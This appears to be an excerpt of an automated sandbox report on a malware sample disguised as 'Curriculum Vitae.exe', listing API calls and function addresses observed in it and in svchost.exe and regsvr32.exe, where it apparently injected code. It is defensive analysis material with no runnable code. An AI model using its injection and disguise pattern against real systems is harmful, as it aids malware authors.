            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD4650 NtSuspendThread,LdrInitializeThunk,6_2_04BD4650
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD4340 NtSetContextThread,LdrInitializeThunk,6_2_04BD4340
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04BD2CA0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04BD2C70
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2C60 NtCreateKey,LdrInitializeThunk,6_2_04BD2C60
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04BD2DF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04BD2DD0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04BD2D30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04BD2D10
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04BD2E80
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04BD2EE0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2FB0 NtResumeThread,LdrInitializeThunk,6_2_04BD2FB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2FE0 NtCreateFile,LdrInitializeThunk,6_2_04BD2FE0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2F30 NtCreateSection,LdrInitializeThunk,6_2_04BD2F30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2AF0 NtWriteFile,LdrInitializeThunk,6_2_04BD2AF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2AD0 NtReadFile,LdrInitializeThunk,6_2_04BD2AD0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04BD2BA0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04BD2BF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04BD2BE0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2B60 NtClose,LdrInitializeThunk,6_2_04BD2B60
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD35C0 NtCreateMutant,LdrInitializeThunk,6_2_04BD35C0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD39B0 NtGetContextThread,LdrInitializeThunk,6_2_04BD39B0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2CF0 NtOpenProcess,6_2_04BD2CF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2CC0 NtQueryVirtualMemory,6_2_04BD2CC0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2C00 NtQueryInformationProcess,6_2_04BD2C00
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2DB0 NtEnumerateKey,6_2_04BD2DB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2D00 NtSetInformationFile,6_2_04BD2D00
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2EA0 NtAdjustPrivilegesToken,6_2_04BD2EA0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2E30 NtWriteVirtualMemory,6_2_04BD2E30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2FA0 NtQuerySection,6_2_04BD2FA0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2F90 NtProtectVirtualMemory,6_2_04BD2F90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2F60 NtCreateProcessEx,6_2_04BD2F60
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2AB0 NtWaitForSingleObject,6_2_04BD2AB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD2B80 NtQueryInformationFile,6_2_04BD2B80
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD3090 NtSetValueKey,6_2_04BD3090
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD3010 NtOpenDirectoryObject,6_2_04BD3010
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD3D10 NtOpenProcessToken,6_2_04BD3D10
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD3D70 NtOpenThread,6_2_04BD3D70
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02948EB0 NtReadFile,6_2_02948EB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02948FA0 NtDeleteFile,6_2_02948FA0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02948D40 NtCreateFile,6_2_02948D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02949050 NtClose,6_2_02949050
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_029491B0 NtAllocateVirtualMemory,6_2_029491B0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048BF2DC NtReadVirtualMemory,6_2_048BF2DC
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00D9D5EB
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D91201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00D91201
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00D9E8F6
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D3CAF00_2_00D3CAF0
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D3BF400_2_00D3BF40
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA20460_2_00DA2046
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D380600_2_00D38060
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D982980_2_00D98298
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D6E4FF0_2_00D6E4FF
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D6676B0_2_00D6676B
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DC48730_2_00DC4873
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D5CAA00_2_00D5CAA0
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D4CC390_2_00D4CC39
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D66DD90_2_00D66DD9
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D391C00_2_00D391C0
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D4B1190_2_00D4B119
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D513940_2_00D51394
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D517060_2_00D51706
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D5781B0_2_00D5781B
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D519B00_2_00D519B0
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D4997D0_2_00D4997D
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D379200_2_00D37920
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D57A4A0_2_00D57A4A
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D57CA70_2_00D57CA7
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D51C770_2_00D51C77
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D69EEE0_2_00D69EEE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DBBE440_2_00DBBE44
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D51F320_2_00D51F32
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_03BB35E00_2_03BB35E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004180232_2_00418023
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F95C2_2_0040F95C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9632_2_0040F963
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011002_2_00401100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004041142_2_00404114
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021D02_2_004021D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162112_2_00416211
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162132_2_00416213
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FB832_2_0040FB83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC032_2_0040DC03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024E02_2_004024E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DD472_2_0040DD47
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D702_2_00402D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E5E32_2_0042E5E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C4E4F66_2_04C4E4F6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C524466_2_04C52446
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C444206_2_04C44420
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C605916_2_04C60591
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA05356_2_04BA0535
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BBC6E06_2_04BBC6E0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B9C7C06_2_04B9C7C0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA07706_2_04BA0770
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BC47506_2_04BC4750
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C320006_2_04C32000
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C581CC6_2_04C581CC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C541A26_2_04C541A2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C601AA6_2_04C601AA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C281586_2_04C28158
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B901006_2_04B90100
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C3A1186_2_04C3A118
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C202C06_2_04C202C0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C402746_2_04C40274
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C603E66_2_04C603E6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BAE3F06_2_04BAE3F0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5A3526_2_04C5A352
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B90CF26_2_04B90CF2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C40CB56_2_04C40CB5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA0C006_2_04BA0C00
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BB8DBF6_2_04BB8DBF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B9ADE06_2_04B9ADE0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BAAD006_2_04BAAD00
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C3CD1F6_2_04C3CD1F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5EEDB6_2_04C5EEDB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BB2E906_2_04BB2E90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5CE936_2_04C5CE93
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5EE266_2_04C5EE26
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA0E596_2_04BA0E59
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BACFE06_2_04BACFE0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C1EFA06_2_04C1EFA0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B92FC86_2_04B92FC8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C14F406_2_04C14F40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BC0F306_2_04BC0F30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BE2F286_2_04BE2F28
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C42F306_2_04C42F30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B868B86_2_04B868B8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BCE8F06_2_04BCE8F0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BAA8406_2_04BAA840
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA28406_2_04BA2840
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA29A06_2_04BA29A0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C6A9A66_2_04C6A9A6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BB69626_2_04BB6962
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B9EA806_2_04B9EA80
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C56BD76_2_04C56BD7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5AB406_2_04C5AB40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B914606_2_04B91460
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5F43F6_2_04C5F43F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C3D5B06_2_04C3D5B0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C575716_2_04C57571
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C516CC6_2_04C516CC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BE56306_2_04BE5630
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5F7B06_2_04C5F7B0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C4F0CC6_2_04C4F0CC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5F0E06_2_04C5F0E0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C570E96_2_04C570E9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA70C06_2_04BA70C0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BAB1B06_2_04BAB1B0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C6B16B6_2_04C6B16B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B8F1726_2_04B8F172
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BD516C6_2_04BD516C
